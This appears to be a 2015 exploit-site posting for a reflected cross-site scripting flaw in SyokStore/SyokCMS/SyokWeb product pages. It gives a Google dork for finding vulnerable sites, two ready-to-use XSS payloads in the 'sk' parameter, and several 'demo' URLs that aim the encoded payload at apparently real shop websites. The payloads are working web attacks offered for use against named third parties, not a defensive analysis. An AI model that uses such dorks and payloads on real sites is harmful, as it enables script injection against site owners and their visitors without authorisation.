SyokStore-SyokCMS-SyokWeb XSS Vulnerability

2015.08.25

Credit: R3NW4

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:\"public/apps/product\" ,or, Empowered by WIWOS.

# Exploit Title: [SyokStore-SyokCMS-SyokWeb XSS Vulnerability]
# Google Dorks: [inurl:"public/apps/product" ,or, Empowered by WIWOS.]
# Date: [24-8-2015]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Version: [ all ]
# Greetz: XSSposed.org - All Kurdish Hackers

-----------------------

Exploit:

site.com/public/apps/product/?sk=r3nw4"> <img src=x onerror=alert(/XSSPOSED/)>

or

site.com/public/apps/product/?sk=R3NW4></sCRipT>">'><sCRipT>alert(/XSSPOSED/)</sCRipT>

-------------------------


DemoZ:

http://www.fantasXydreams.com.my/public/apps/product/?sk=r3nw4%22%3E%20%3Cimg%20src=x%20onerror=alert%28/XSSPOSED/%29%3E

http://hangthaiwXatch.com/public/apps/product/?sk=r3nw4%22%3E%20%3Cimg%20src=x%20onerror=alert%28/XSSPOSED/%29%3E

http://miinebouXtique.sykcms.com/public/apps/product/?sk=r3nw4%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert%28%2FXSSPOSED%2F%29%3E

http://www.ebXest.my/public/apps/product/?sk=r3nw4%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert%28%2FXSSPOSED%2F%29%3E

http://megaaXlpha.com.my/public/apps/product/?sk=R3NW4%3E%3C/sCRipT%3E%22%3E%27%3E%3CsCRipT%3Ealert%28/XSSPOSED/%29%3C/sCRipT%3E
------------------------

# https://twitter.com/R3NW4

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SyokStore-SyokCMS-SyokWeb XSS Vulnerability

Dork: inurl:\"public/apps/product\" ,or, Empowered by WIWOS.

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.